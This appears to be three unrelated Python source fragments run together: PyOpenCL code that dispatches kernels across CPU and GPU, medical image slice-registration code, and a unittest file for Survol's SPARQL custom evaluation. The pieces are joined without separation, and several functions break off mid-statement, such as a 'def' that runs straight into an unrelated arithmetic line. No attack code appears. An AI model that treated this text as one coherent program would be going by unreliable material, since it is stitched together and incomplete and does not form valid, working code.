cl.enqueue_copy(queue, self.data['output'][i][eo:eo + ne], self.output_buffers[obj][i], is_blocking=False, wait_for=depends[i]) j = len(self.output_buffers[obj]) for i in range(len(self.io_buffers[obj])): if self.buffer_info['io'][i]['enq_read']: eo, ne = self.get_slice_values(self.buffer_info['io'][i], size_percent, offset_percent, **kwargs) logging.debug("PARTITION_%s : %s Enqueue_Read_IO_Buffers_element_offset : %s", obj, self.name, eo) logging.debug("PARTITION_%s : %s Enqueue_Read_IO_Buffers_number_of_elements : %s", obj, self.name, ne) ioev[i] = cl.enqueue_copy(queue, self.data['io'][i][eo:eo + ne], self.io_buffers[obj][i], is_blocking=False, wait_for=depends[i + j]) oev.extend(ioev) logging.debug("PARTITION : Number of read buffers %d" % (len(oev))) barrier_event = cl.enqueue_barrier(queue, wait_for=oev) barrier_event.set_callback(cl.command_execution_status.COMPLETE, notify_callback(self, obj, q_id, 'READ', oev,host_event_info=kwargs['host_event'], callback=callback)) return barrier_event def dispatch(self, gpu, cpu, ctxs, cmd_qs, lw_callback = False ,dep=None, partition=None, callback=blank_fn, **kwargs): """ Dispatches Kernel with given partition class value (0,1,2,...,10). 0 is for complete CPU and 10 is for complete GPU. :param gpu: Denotes the index of gpu device in cmd_qs['gpu'] list or is -1 if we don't want to use device of this type. :type gpu: Integer :param cpu: Denotes the index of cpu device in cmd_qs['cpu'] list or is -1 if we don't want to use device of this type. :type cpu: Integer :param ctxs: Dictionary of Contexts for CPU and GPU devices. :type ctxs: dict :param cmd_qs: Dictionary of list of Command Queues :type cmd_qs: dict :param lw_callback : Set to true if callback should be initiated only for WRITE for each command queue on each device :type : bool :param dep: PyOpenCL Event on which subsequent write operations will be dependent on stored in a list :param partition: Integer from 0 to 10 or None denoting partition class value. :type partition: Integer :param callback: A function that will run on the host side once the kernel completes execution on the device. Handle unexpected arguments. :return: Tuple with first element being the starting time (host side) of dispatch and second element being list of kernel events for both CPU and GPU devices :rtype: Tuple """ dispatch_start = time.time() logging.debug("DISPATCH : Dispatch function call for %s starts at %s", self.name, dispatch_start) gpu_host_events = HostEvents(self.name, self.id, dispatch_start=dispatch_start) cpu_host_events = HostEvents(self.name, self.id, dispatch_start=dispatch_start) self.lw_callback = lw_callback self.cb_events = {} if not lw_callback: for key in cmd_qs: n = len(cmd_qs[key]) self.cb_events[key] = [] for _ in range(n): self.cb_events[key].append({"write_done": threading.Event(),"kernel_done" : threading.Event()}) if partition is not None: self.partition = partition if dep: deps = dep else: deps = {key: cl.UserEvent(ctxs[key]) for key in ['cpu', 'gpu']} if gpu != -1 and cpu != -1: size_percent = self.partition * 10 elif gpu == -1 and cpu != -1: size_percent = 0 self.partition = 0 elif cpu == -1 and gpu != -1: size_percent = 100 self.partition = 10 else: return None, None gdone, cdone = [], [] if self.partition not in [0, 10]: self.chunks_left = 2 if gpu != -1 and self.partition != 0: dispatch_id = generate_unique_id() # while test_and_set(0, 1): # pass rqLock.acquire() global nGPU nGPU -= 1 #rqlock[0] = 0 rqLock.release() offset_percent = 0 logging.debug("DISPATCH_gpu : Evaluation of kernel arguments for %s on GPU", self.name) self.eval_vargs(size_percent=size_percent, offset_percent=offset_percent) gpu_host_events.create_buf_start = time.time() logging.debug("DISPATCH_gpu : Creation of buffers for %s on GPU", self.name) self.create_buffers(ctxs['gpu'], 'gpu', size_percent, offset_percent) gpu_host_events.create_buf_end = time.time() logging.debug("DISPATCH_gpu : Setting kernel arguments for %s on GPU", self.name) self.set_kernel_args('gpu') logging.debug("DISPATCH_gpu :Calling enqueue_write_buffers for GPU") gdone.append(self.enqueue_write_buffers(cmd_qs['gpu'][gpu], gpu, 'gpu', size_percent, offset_percent, deps=[deps['gpu']], did=dispatch_id, host_event=gpu_host_events)) logging.debug("DISPATCH_gpu : Calling enqueue_nd_range_kernel for GPU") gdone.append( self.enqueue_nd_range_kernel(cmd_qs['gpu'][gpu], gpu, 'gpu', size_percent, 0, deps=[gdone[-1]], did=dispatch_id, host_event=gpu_host_events,C=kwargs['C_gpu'])) logging.debug("DISPATCH_gpu : Calling enqueue_read_buffers for GPU") gdone.append(self.enqueue_read_buffers(cmd_qs['gpu'][gpu], gpu, 'gpu', size_percent, offset_percent, deps=[gdone[-1]], callback=callback, did=dispatch_id, host_event=gpu_host_events)) if cpu != -1 and self.partition != 10: # while test_and_set(0, 1): # pass rqLock.acquire() global nCPU nCPU -= 1 #rqlock[0] = 0 rqLock.release() dispatch_id = generate_unique_id() offset_percent = size_percent size_percent = 100 - size_percent logging.debug("DISPATCH_cpu : Evaluation of kernel arguments for %s on CPU", self.name) self.eval_vargs(size_percent=size_percent, offset_percent=offset_percent) logging.debug("DISPATCH_cpu : Calling creating_buffers for %s on CPU", self.name) cpu_host_events.create_buf_start = time.time() self.create_buffers(ctxs['cpu'], 'cpu', size_percent, offset_percent) cpu_host_events.create_buf_end = time.time() logging.debug("DISPATCH_cpu : Calling set_kernel_args for %s on CPU", self.name) self.set_kernel_args('cpu') logging.debug("DISPATCH_cpu : Calling enqueue_write_buffers for %s on CPU", self.name) cdone.append(self.enqueue_write_buffers(cmd_qs['cpu'][cpu], cpu, 'cpu', size_percent, offset_percent, deps=[deps['cpu']], did=dispatch_id, host_event=cpu_host_events)) logging.debug("DISPATCH_cpu : Evaluation of enqueue_nd_range_kernel for %s on CPU", self.name) cdone.append( self.enqueue_nd_range_kernel(cmd_qs['cpu'][cpu], cpu, 'cpu', size_percent, 0, deps=[cdone[-1]], did=dispatch_id, host_event=cpu_host_events, C=kwargs['C_cpu'])) logging.debug("DISPATCH_cpu : Evaluation of enqueue_read_buffers for %s on CPU", self.name) cdone.append(self.enqueue_read_buffers(cmd_qs['cpu'][cpu], cpu, 'cpu', size_percent, offset_percent, deps=[cdone[-1]], callback=callback, did=dispatch_id, host_event=cpu_host_events)) if not dep: for key in ['gpu', 'cpu']: deps[key].set_status(cl.command_execution_status.COMPLETE) start_time = time.time() logging.debug("DISPATCH : %s ke.dispatch_end %s ", self.name, start_time) logging.debug("DISPATCH : Evaluation of kernel arguments for %s ", self.name) logging.debug("DISPATCH : Number of events %d" % (len(gdone + cdone))) cmd_qs['gpu'][gpu].flush() cmd_qs['cpu'][cpu].flush() dispatch_end = time.time() logging.debug("DISPATCH : Dispatch function call for %s ends at %s", self.name, dispatch_end) return start_time, gdone + cdone ###########################################TODO######################################################### def enqueue_write_buffers_dag(self, task , h , queue, q_id, obj, n_chunks=1, chunk_number=0, deps=None, **kwargs): """ Enqueues list of write buffer operations to the OpenCL Runtime. :param queue: Command Queue for a CPU or a GPU device :type queue: pyopencl.CommandQueue :param q_id: ID of queue :type q_id: Integer :param obj: Device Type (CPU or GPU) :type obj: String :param size_percent: Percentage of problem space to be processed :type size_percent: Integer :param offset_percent: Percentage for offset required for selection of host array space to be copied to buffer :type offset_percent: Integer :param deps: Initial PyOpenCL Event on which subsequent write operations will be dependent stored in a list :type deps: list of pyopencl.Event Objects :param kwargs: :type kwargs: :return: Barrier Event signifying end of write operation :rtype: pyopencl.event """ iev = list() ioev =list() global enque_write , duplicate_write depends = [None] * (len(self.input_buffers[obj]) + len(self.io_buffers[obj])) if len(depends) == 0: depends = [None] if deps: depends[0] = deps logging.debug("PARTITION : Enqueuing Write Buffers %s",obj) #kwargs['host_event'].write_start = time.time() start_barrier_event = cl.enqueue_barrier(queue, wait_for=depends[0]) for i in range(len(self.input_buffers[obj])): if self.buffer_info['input'][i]['enq_write']: if self.buffer_info['input'][i]['break'] ==0: if chunk_number > 0: continue eo,ne = 0,self.buffer_info['input'][i]['size'] else: eo, ne = self.get_chunking_indices(self.buffer_info['input'][i]['size'], chunk_number, n_chunks) logging.debug("PARTITION_%s : %s Enqueue_Write_Input_Buffers_element_offset : %s", obj, self.name, eo) logging.debug("PARTITION_%s : %s Enqueue_Write_Input_Buffers_number_of_elements : %s", obj, self.name, ne) iev.append( cl.enqueue_copy(queue, self.input_buffers[obj][i], self.data['input'][i][eo:eo + ne], is_blocking=False, wait_for=depends[i],\ device_offset=(self.data['input'][i][:eo].nbytes) )) #logging.info("CHECKING COPYING OF DATA") #print "ALL INPUT ",self.data['input'][i] #print "INPUT BEING COPIED",self.data['input'][i][eo:eo+ne] duplicate_write = duplicate_write + 1 enque_write = enque_write + 1 # if self.input_buffers[obj]: # depends = [None] * len(self.io_buffers[obj]) j = len(self.input_buffers[obj]) for i in range(len(self.io_buffers[obj])): if self.buffer_info['io'][i]['enq_write']: if self.buffer_info['io'][i]['break'] ==0: if chunk_number > 0: continue eo,ne = 0,self.buffer_info['io'][i]['size'] else: eo, ne = self.get_chunking_indices(self.buffer_info['io'][i]['size'], chunk_number, n_chunks) logging.debug("PARTITION_%s : %s Enqueue_Write_IO_Buffers_element_offset : %s", obj, self.name, eo) logging.debug("PARTITION_%s : %s Enqueue_Write_IO_number_of_elements : %s", obj, self.name, ne) logging.debug(str(depends)+"here") logging.debug(str(i+j)) ioev.append( cl.enqueue_copy(queue, self.io_buffers[obj][i], self.data['io'][i][eo:eo + ne], is_blocking=False, wait_for=depends[i + j],\ device_offset=self.data['io'][i][:eo].nbytes)) iev.extend(ioev) logging.debug("PARTITION : Number of write buffers %d" % (len(iev))) if(len(iev) == 0): barrier_event = cl.enqueue_barrier(queue, wait_for=None) else: barrier_event = cl.enqueue_barrier(queue, wait_for=iev) # if iev: # iev[-1].set_callback(cl.command_execution_status.COMPLETE, # notify_callback_dag(self , obj, q_id, 'WRITE', iev, host_event_info=kwargs['host_event'] )) # # else: # barrier_event.set_callback(cl.command_execution_status.COMPLETE, # notify_callback_dag(self , obj, q_id, 'WRITE', iev, host_event_info=kwargs['host_event'] )) self.write_events.extend(iev) return barrier_event def
* Sx + mean_dest_x coord_init_pix_scaleXinv = np.copy(coord_init_pix) coord_init_pix_scaleXinv[:, 0] = (coord_init_pix[:, 0] - mean_dest_x) / float(Sx) + mean_src_x # apply transformation to image from skimage.transform import warp row_scaleXinv = np.reshape(coord_init_pix_scaleXinv[:, 0], [nx, ny]) src2d_scaleX = warp(src2d, np.array([row_scaleXinv, col]), order=1) # ============================================================ # COLUMN-WISE REGISTRATION (Y dimension for each Xi) # ============================================================ coord_init_pix_scaleY = np.copy(coord_init_pix) # need to use np.copy to avoid copying pointer coord_init_pix_scaleYinv = np.copy(coord_init_pix) # need to use np.copy to avoid copying pointer # coord_src2d_scaleXY = np.copy(coord_src2d_scaleX) # need to use np.copy to avoid copying pointer # loop across columns (X dimension) for ix in range(nx): # retrieve 1D signal along Y src1d = src2d_scaleX[ix, :] dest1d = dest2d[ix, :] # make sure there are non-zero data in src or dest if np.any(src1d > th_nonzero) and np.any(dest1d > th_nonzero): # retrieve min/max of non-zeros elements (edge of the segmentation) # src1d_min, src1d_max = min(np.nonzero(src1d)[0]), max(np.nonzero(src1d)[0]) # dest1d_min, dest1d_max = min(np.nonzero(dest1d)[0]), max(np.nonzero(dest1d)[0]) # 1D matching between src_y and dest_y # Ty = (dest1d_max + dest1d_min)/2 - (src1d_max + src1d_min)/2 # Sy = (dest1d_max - dest1d_min) / float(src1d_max - src1d_min) # apply translation and scaling to coordinates in column # get indices (in continuous space) at half-maximum of upward and downward slope # src1d_min, src1d_max = find_index_halfmax(src1d) # dest1d_min, dest1d_max = find_index_halfmax(dest1d) src1d_min, src1d_max = np.min(np.where(src1d > th_nonzero)), np.max(np.where(src1d > th_nonzero)) dest1d_min, dest1d_max = np.min(np.where(dest1d > th_nonzero)), np.max(np.where(dest1d > th_nonzero)) # 1D matching between src_y and dest_y mean_dest_y = (dest1d_max + dest1d_min) / 2 mean_src_y = (src1d_max + src1d_min) / 2 # Tx = (dest1d_max + dest1d_min)/2 - (src1d_max + src1d_min)/2 Sy = (dest1d_max - dest1d_min + 1) / float(src1d_max - src1d_min + 1) # apply forward transformation (in pixel space) # below: only for debugging purpose # coord_src2d_scaleX = np.copy(coord_src2d) # need to use np.copy to avoid copying pointer # coord_src2d_scaleX[:, 0] = (coord_src2d[:, 0] - mean_src) * Sx + mean_dest # coord_init_pix_scaleY = np.copy(coord_init_pix) # need to use np.copy to avoid copying pointer # coord_init_pix_scaleY[:, 0] = (coord_init_pix[:, 0] - mean_src ) * Sx + mean_dest range_x = list(range(ix * ny, ix * ny + nx)) coord_init_pix_scaleY[range_x, 1] = (coord_init_pix[range_x, 1] - mean_src_y) * Sy + mean_dest_y coord_init_pix_scaleYinv[range_x, 1] = (coord_init_pix[range_x, 1] - mean_dest_y) / float(Sy) + mean_src_y # apply transformation to image col_scaleYinv = np.reshape(coord_init_pix_scaleYinv[:, 1], [nx, ny]) src2d_scaleXY = warp(src2d, np.array([row_scaleXinv, col_scaleYinv]), order=1) # regularize Y warping fields from skimage.filters import gaussian col_scaleY = np.reshape(coord_init_pix_scaleY[:, 1], [nx, ny]) col_scaleYsmooth = gaussian(col_scaleY, smoothWarpXY) col_scaleYinvsmooth = gaussian(col_scaleYinv, smoothWarpXY) # apply smoothed transformation to image src2d_scaleXYsmooth = warp(src2d, np.array([row_scaleXinv, col_scaleYinvsmooth]), order=1) # reshape warping field as 1d coord_init_pix_scaleY[:, 1] = col_scaleYsmooth.ravel() coord_init_pix_scaleYinv[:, 1] = col_scaleYinvsmooth.ravel() # display if verbose == 2: # FIG 1 plt.figure(figsize=(15, 3)) # plot #1 ax = plt.subplot(141) plt.imshow(np.swapaxes(src2d, 1, 0), cmap=plt.cm.gray, interpolation='none') plt.hold(True) # add other layer plt.imshow(np.swapaxes(dest2d, 1, 0), cmap=plt.cm.copper, interpolation='none', alpha=0.5) plt.title('src') plt.xlabel('x') plt.ylabel('y') plt.xlim(mean_dest_x - 15, mean_dest_x + 15) plt.ylim(mean_dest_y - 15, mean_dest_y + 15) ax.grid(True, color='w') # plot #2 ax = plt.subplot(142) plt.imshow(np.swapaxes(src2d_scaleX, 1, 0), cmap=plt.cm.gray, interpolation='none') plt.hold(True) # add other layer plt.imshow(np.swapaxes(dest2d, 1, 0), cmap=plt.cm.copper, interpolation='none', alpha=0.5) plt.title('src_scaleX') plt.xlabel('x') plt.ylabel('y') plt.xlim(mean_dest_x - 15, mean_dest_x + 15) plt.ylim(mean_dest_y - 15, mean_dest_y + 15) ax.grid(True, color='w') # plot #3 ax = plt.subplot(143) plt.imshow(np.swapaxes(src2d_scaleXY, 1, 0), cmap=plt.cm.gray, interpolation='none') plt.hold(True) # add other layer plt.imshow(np.swapaxes(dest2d, 1, 0), cmap=plt.cm.copper, interpolation='none', alpha=0.5) plt.title('src_scaleXY') plt.xlabel('x') plt.ylabel('y') plt.xlim(mean_dest_x - 15, mean_dest_x + 15) plt.ylim(mean_dest_y - 15, mean_dest_y + 15) ax.grid(True, color='w') # plot #4 ax = plt.subplot(144) plt.imshow(np.swapaxes(src2d_scaleXYsmooth, 1, 0), cmap=plt.cm.gray, interpolation='none') plt.hold(True) # add other layer plt.imshow(np.swapaxes(dest2d, 1, 0), cmap=plt.cm.copper, interpolation='none', alpha=0.5) plt.title('src_scaleXYsmooth (s=' + str(smoothWarpXY) + ')') plt.xlabel('x') plt.ylabel('y') plt.xlim(mean_dest_x - 15, mean_dest_x + 15) plt.ylim(mean_dest_y - 15, mean_dest_y + 15) ax.grid(True, color='w') # save figure plt.savefig(os.path.join(path_qc, 'register2d_columnwise_image_z' + str(iz) + '.png')) plt.close() # ============================================================ # CALCULATE TRANSFORMATIONS # ============================================================ # calculate forward transformation (in physical space) coord_init_phy_scaleX = np.array(im_dest.transfo_pix2phys(coord_init_pix_scaleX)) coord_init_phy_scaleY = np.array(im_dest.transfo_pix2phys(coord_init_pix_scaleY)) # calculate inverse transformation (in physical space) coord_init_phy_scaleXinv = np.array(im_src.transfo_pix2phys(coord_init_pix_scaleXinv)) coord_init_phy_scaleYinv = np.array(im_src.transfo_pix2phys(coord_init_pix_scaleYinv)) # compute displacement per pixel in destination space (for forward warping field) warp_x[:, :, iz] = np.array([coord_init_phy_scaleXinv[i, 0] - coord_init_phy[i, 0] for i in range(nx * ny)]).reshape((nx, ny)) warp_y[:, :, iz] = np.array([coord_init_phy_scaleYinv[i, 1] - coord_init_phy[i, 1] for i in range(nx * ny)]).reshape((nx, ny)) # compute displacement per pixel in source space (for inverse warping field) warp_inv_x[:, :, iz] = np.array([coord_init_phy_scaleX[i, 0] - coord_init_phy[i, 0] for i in range(nx * ny)]).reshape((nx, ny)) warp_inv_y[:, :, iz] = np.array([coord_init_phy_scaleY[i, 1] - coord_init_phy[i, 1] for i in range(nx * ny)]).reshape((nx, ny)) # Generate forward warping field (defined in destination space) generate_warping_field(fname_dest, warp_x, warp_y, fname_warp, verbose) # Generate inverse warping field (defined in source space) generate_warping_field(fname_src, warp_inv_x, warp_inv_y, fname_warp_inv, verbose) def register2d(fname_src, fname_dest, fname_mask='', fname_warp='warp_forward.nii.gz', fname_warp_inv='warp_inverse.nii.gz', paramreg=Paramreg(step='0', type='im', algo='Translation', metric='MI', iter='5', shrink='1', smooth='0', gradStep='0.5'), ants_registration_params={'rigid': '', 'affine': '', 'compositeaffine': '', 'similarity': '', 'translation': '', 'bspline': ',10', 'gaussiandisplacementfield': ',3,0', 'bsplinedisplacementfield': ',5,10', 'syn': ',3,0', 'bsplinesyn': ',1,3'}, verbose=0): """Slice-by-slice registration of two images. We first split the 3D images into 2D images (and the mask if inputted). Then we register slices of the two images that physically correspond to one another looking at the physical origin of each image. The images can be of different sizes but the destination image must be smaller thant the input image. We do that using antsRegistration in 2D. Once this has been done for each slices, we gather the results and return them. Algorithms implemented: translation, rigid, affine, syn and BsplineSyn. N.B.: If the mask is inputted, it must also be 3D and it must be in the same space as the destination image. input: fname_source: name of moving image (type: string) fname_dest: name of fixed image (type: string) mask[optional]: name of mask file (type: string) (parameter -x of antsRegistration) fname_warp: name of output 3d forward warping field fname_warp_inv: name of output 3d inverse warping field paramreg[optional]: parameters of antsRegistration (type: Paramreg class from sct_register_multimodal) ants_registration_params[optional]: specific algorithm's parameters for antsRegistration (type: dictionary) output: if algo==translation: x_displacement: list of translation along x axis for each slice (type: list) y_displacement: list of translation along y axis for each slice (type: list) if algo==rigid: x_displacement: list of translation along x axis for each slice (type: list) y_displacement: list of translation along y axis for each slice (type: list) theta_rotation: list of rotation angle in radian (and in ITK's coordinate system) for each slice (type: list) if algo==affine or algo==syn or algo==bsplinesyn: creation of two 3D warping fields (forward and inverse) that are the concatenations of the slice-by-slice warps. """ # set metricSize if paramreg.metric == 'MI': metricSize = '32' # corresponds to number of bins else: metricSize = '4' # corresponds to radius (for CC, MeanSquares...) # Get image dimensions and retrieve nz sct.printv('\nGet image dimensions of destination image...', verbose) nx, ny, nz, nt, px, py, pz, pt = Image(fname_dest).dim sct.printv('.. matrix size: ' + str(nx) + ' x ' + str(ny) + ' x ' + str(nz), verbose) sct.printv('.. voxel size: ' + str(px) + 'mm x ' + str(py) + 'mm x ' + str(pz) + 'mm', verbose) # Split input volume along z sct.printv('\nSplit input volume...', verbose) from sct_image import split_data im_src = Image('src.nii') split_source_list = split_data(im_src, 2) for im in split_source_list: im.save() # Split destination volume along z sct.printv('\nSplit destination volume...', verbose) im_dest = Image('dest.nii') split_dest_list = split_data(im_dest, 2) for im in split_dest_list: im.save() # Split mask volume along z if fname_mask != '': sct.printv('\nSplit mask volume...', verbose) im_mask = Image('mask.nii.gz') split_mask_list = split_data(im_mask, 2) for im in split_mask_list: im.save() # coord_origin_dest = im_dest.transfo_pix2phys([[0,0,0]]) # coord_origin_input = im_src.transfo_pix2phys([[0,0,0]]) # coord_diff_origin = (np.asarray(coord_origin_dest[0]) - np.asarray(coord_origin_input[0])).tolist() # [x_o, y_o, z_o] = [coord_diff_origin[0] * 1.0/px, coord_diff_origin[1] * 1.0/py, coord_diff_origin[2] * 1.0/pz] # initialization if paramreg.algo in ['Translation']: x_displacement = [0 for i in range(nz)] y_displacement = [0 for i in range(nz)] theta_rotation
<filename>tests/test_sparql_custom_evals_survol.py #!/usr/bin/env python from __future__ import print_function import os import sys import subprocess import tempfile import rdflib import unittest import psutil from init import * update_test_path() import lib_util import lib_kbase import lib_sparql_custom_evals survol_namespace = lib_kbase.LDT class SurvolStore(rdflib.plugins.memory.IOMemory): """The derived class of a plain rdflib store helps debugging.""" def __init__(self, configuration=None, identifier=None): super(SurvolStore, self).__init__(configuration) def triples(self, t_triple, context=None): t_subject, t_predicate, t_object = t_triple # print("triples vals=",t_subject, t_predicate, t_object) # print("triples typs=",type(t_subject), type(t_predicate), type(t_object)) """ triples vals= None http://www.w3.org/1999/02/22-rdf-syntax-ns#type http://primhillcomputer.com/ontologies/CIM_Directory triples typs= <type 'NoneType'> <class 'rdflib.term.URIRef'> <class 'rdflib.term.URIRef'> """ return super(SurvolStore, self).triples((t_subject, t_predicate, t_object), context) def _create_graph(): """The return value behaves exactly like a rdflib Graph plus ease of debuggign if needed""" survol_store = SurvolStore() rdflib_graph = rdflib.Graph(survol_store) return rdflib_graph # This displays the correct case for a filename. This is necessary because # the variable sys.executable is not correctly cased with pytest on Windows. # "c:\python27\python.exe" into "C:/Python27/python.exe" sys_executable_case = lib_util.standardized_file_path(sys.executable) ################################################################################ # TODO: If the class is not statically defined, use WMI or WBEM, # without using SeeAlso. # If a property or an associator is not defined is a custom property, # use WMI or WBEM. # # Use rdfs:seeAlso for scripts: It just loads the content. # Comme seeAlso est un attribute, on passe les parametres. # ?url_file rdf:type survol:CIM_DataFile . # ?url_file rdfs:seeAlso "survol:CIM_DataFile/python_properties" . # ?url_file survol:CIM_ProcessExecutable ?url_proc . # # Other query examples. # {'url_proc': {'CSName': 'RCHATEAU-HP', 'Name': 'python.exe', 'ProcessId': str(CurrentPid), # 'Handle': str(CurrentPid), # 'OSCreationClassName': 'Win32_OperatingSystem', # '__class__': 'CIM_Process', # 'rdf-schema#isDefinedBy': 'WMI', # 'ParentProcessId': str(CurrentParentPid), # 'Caption': 'python.exe', # 'CSCreationClassName': 'Win32_ComputerSystem', 'Description': 'python.exe', # 'ExecutablePath': 'C:\\\\Python27\\\\python.exe', # 'CreationClassName': 'Win32_Process', }, # 'url_file': {'CSName': 'RCHATEAU-HP', # 'FSCreationClassName': 'Win32_FileSystem', # 'Description': 'c:\\\\python27\\\\python.exe', '__class__': 'CIM_DataFile', # 'rdf-schema#isDefinedBy': 'WMI', # 'Name': 'c:\\\\python27\\\\python.exe', # 'FileType': 'Application', 'Drive': 'c:', 'Extension': 'exe', # 'Caption': 'c:\\\\python27\\\\python.exe', # 'CSCreationClassName': 'Win32_ComputerSystem', 'FileName': 'python', # 'CreationClassName': 'CIM_LogicalFile'}}, # ], ################################################################################ # Utilities functions. # Sparql does easily accept strings with backslahes. Therefore, it is simpler # to enforce a plain slash as file path separator for Windows. _temp_dir_path = lib_util.standardized_file_path(tempfile.gettempdir()) def _create_temp_file(): tmp_filename = "survol_temp_file_%d.tmp" % os.getpid() tmp_pathname = os.path.join(_temp_dir_path, tmp_filename) tmpfil = open(tmp_pathname, "w") tmpfil.close() return tmp_pathname # This generates an unique directory name. _unique_string = "%d_%f" % (os.getpid(), time.time()) def _print_subprocesses(proc_id, depth = 0): for one_proc in psutil.Process(proc_id).children(recursive=False): print(" " * depth, one_proc.pid) _print_subprocesses(one_proc.pid, depth+1) class CUSTOM_EVALS_Survol_Base_Test(unittest.TestCase): """ This sets the CUSTOM_EVALS callback for all derived tests. It is mandatory to define which sets of classes are used to create CIM objects. There might be several representations, with an overlap of plain CIM classes: - WMI: Classes and instances are listed with WMI calls exclusively. This is for Windows. - WBEM: Classes and instances are listed with WBEM and pywbem calls exclusively. This is for Linux. - Survol: Which derived from WMI or WBEM and adds it owns classes which are not represented yet in CIM, WMI or WBEM. """ def setUp(self): # add function directly, normally we would use setuptools and entry_points rdflib.plugins.sparql.CUSTOM_EVALS['custom_eval_function'] = lib_sparql_custom_evals.custom_eval_function def tearDown(self): if 'custom_eval_function' in rdflib.plugins.sparql.CUSTOM_EVALS: del rdflib.plugins.sparql.CUSTOM_EVALS['custom_eval_function'] class CUSTOM_EVALS_Low_Level_Test(CUSTOM_EVALS_Survol_Base_Test): """ This tests low-level and internal features. """ def _one_return_tst(self, num_results_expected, return_variables): # https://docs.python.org/3/library/itertools.html#itertools.combinations # itertools.product def make_var(input_var): """ This receives input data for testing the enujmeration of all combinations of variables and values. It just transforms the variable names into rdflib variable nodes, and values into rdflib literals. This is needed to test the library function whch calculates the combinations. :param input_var: This is a dictionary whose keys are tuples of strings representing Sparql variables. :return: """ return_dict = {} for variables_tuple, values_list in input_var.items(): var_node = tuple(rdflib.term.Variable(variable_name) for variable_name in variables_tuple) values_nodes = [ tuple(rdflib.term.Literal(one_value) for one_value in one_value_tuple) for one_value_tuple in values_list] return_dict[var_node] = values_nodes return return_dict input_as_variables = make_var(return_variables) results_iter = lib_sparql_custom_evals.product_variables_lists(input_as_variables) print("return_variables=", return_variables) results_list = list(results_iter) for one_resu in results_list: print("one_resu=", one_resu) num_results_actual = len(results_list) self.assertEqual(num_results_actual, num_results_expected) def test_prod_variables(self): """ This tests the enumeration of all possible combination of values or a set of input variables, that is, the cartesians product of Sparql variables and their values. This loops on all possible combinations. """ self._one_return_tst(1, {('a',): [('a1',)], ('b',): [('b1',)], ('c',): [('c1',)], }) self._one_return_tst(2, {('a',): [('a1',)], ('b',): [('b1',), ('b2',)], ('c',): [('c1',)], }) self._one_return_tst(6, {('a',): [('a1',)], ('b',): [('b1',), ('b2',)], ('c',): [('c1',), ('c2',), ('c3',)], }) self._one_return_tst(2, {('a', 'aa'): [('a1', 'aa1')], ('b',): [('b1',), ('b2',)], ('c',): [('c1',)], }) self._one_return_tst(4, {('a', 'aa'): [('a1', 'aa1'), ('a2', 'aa2')], ('b',): [('b1',), ('b2',)], ('c',): [('c1',)], }) class CUSTOM_EVALS_Basic_Sparql_Queries_Test(CUSTOM_EVALS_Survol_Base_Test): def test_sparql_parent(self): rdflib_graph = _create_graph() # C:/Windows/temp\\survol_temp_file_12532.tmp' tmp_pathname = _create_temp_file() # Sparql does not accept backslashes. tmp_pathname = lib_util.standardized_file_path(tmp_pathname) sparql_query = """ PREFIX survol: <%s> SELECT ?directory_name WHERE { ?url_directory a survol:CIM_Directory . ?url_datafile a survol:CIM_DataFile . ?url_directory survol:CIM_DirectoryContainsFile ?url_datafile . ?url_directory survol:Name ?directory_name . ?url_datafile survol:Name "%s" . } """ % (survol_namespace, tmp_pathname) query_result = list(rdflib_graph.query(sparql_query)) self.assertEqual(str(query_result[0][0]), _temp_dir_path) print("Result=", query_result) def test_sparql_children_files(self): rdflib_graph = _create_graph() # C:/Windows/temp\\survol_temp_file_12532.tmp' tmp_pathname = lib_util.standardized_file_path(_create_temp_file()) sparql_query = """ PREFIX survol: <%s> SELECT ?datafile_name WHERE { ?url_directory a survol:CIM_Directory . ?url_datafile a survol:CIM_DataFile . ?url_directory survol:CIM_DirectoryContainsFile ?url_datafile . ?url_datafile survol:Name ?datafile_name . ?url_directory survol:Name "%s" . } """ % (survol_namespace, _temp_dir_path) query_result = list(rdflib_graph.query(sparql_query)) print("Result=", query_result) self.assertTrue(tmp_pathname in [str(node[0]) for node in query_result]) def test_sparql_grandparent(self): rdflib_graph = _create_graph() # C:/Windows/temp\\survol_temp_file_12532.tmp' tmp_pathname = _create_temp_file() # Sparql does not accept backslashes. tmp_pathname = lib_util.standardized_file_path(tmp_pathname) sparql_query = """ PREFIX survol: <%s> SELECT ?grandparent_name WHERE { ?url_grandparent a survol:CIM_Directory . ?url_directory a survol:CIM_Directory . ?url_datafile a survol:CIM_DataFile . ?url_grandparent survol:CIM_DirectoryContainsFile ?url_directory . ?url_directory survol:CIM_DirectoryContainsFile ?url_datafile . ?url_grandparent survol:Name ?grandparent_name . ?url_datafile survol:Name "%s" . } """ % (survol_namespace, tmp_pathname) query_result = list(rdflib_graph.query(sparql_query)) print("Result=", query_result) temp_dir_path_dir = lib_util.standardized_file_path(os.path.dirname(_temp_dir_path)) self.assertEqual(str(query_result[0][0]), temp_dir_path_dir) def _create_files_tree(self, prefix, files_tree): def _create_files_tree_aux(root_dir, files_tree): os.makedirs(root_dir) for key, value in files_tree.items(): one_path = os.path.join(root_dir, key) if value: assert isinstance(value, dict) _create_files_tree_aux(one_path, value) else: open(one_path, "w").close() root_dir = os.path.join(_temp_dir_path, "survol_temp_%s_%s" % (prefix, _unique_string)) _create_files_tree_aux(root_dir, files_tree) return root_dir def test_sparql_grandchildren_files(self): rdflib_graph = _create_graph() files_tree = { "dir_1" : { "dir_1_1" : { "file_1_1_1.txt": None}}, "dir_2": {"dir_2_1": {"file_2_1_1.txt": None, "file_2_1_2.txt": None, "file_2_1_3.txt": None}}, "file_3.txt": None, "dir_4": {"dir_4_1": {"file_4_1_1.txt": None, "dir_4_1_1_1": {"file_4_1_1_1_1.txt": None, }, "file_4_2.txt":None}}, "dir_5": {"file_5_1.txt": None}, } test_root_dir = self._create_files_tree("tst_grand_children", files_tree) test_root_dir = lib_util.standardized_file_path(test_root_dir) sparql_query = """ PREFIX survol: <%s> SELECT ?datafile_name WHERE { ?url_directory_0 a survol:CIM_Directory . ?url_directory_0 survol:Name "%s" . ?url_directory_0 survol:CIM_DirectoryContainsFile ?url_directory_1 . ?url_directory_1 a survol:CIM_Directory . ?url_directory_1 survol:Name ?directory_name_1 . ?url_directory_1 survol:CIM_DirectoryContainsFile ?url_directory_2 . ?url_directory_2 a survol:CIM_Directory . ?url_directory_2 survol:Name ?directory_name_2 . ?url_directory_2 survol:CIM_DirectoryContainsFile ?url_datafile . ?url_datafile a survol:CIM_DataFile . ?url_datafile survol:Name ?datafile_name . } """ % (survol_namespace, test_root_dir) query_result = list(rdflib_graph.query(sparql_query)) def dir_depth(dir_path): return len(os.path.normpath(dir_path).split(os.path.sep)) 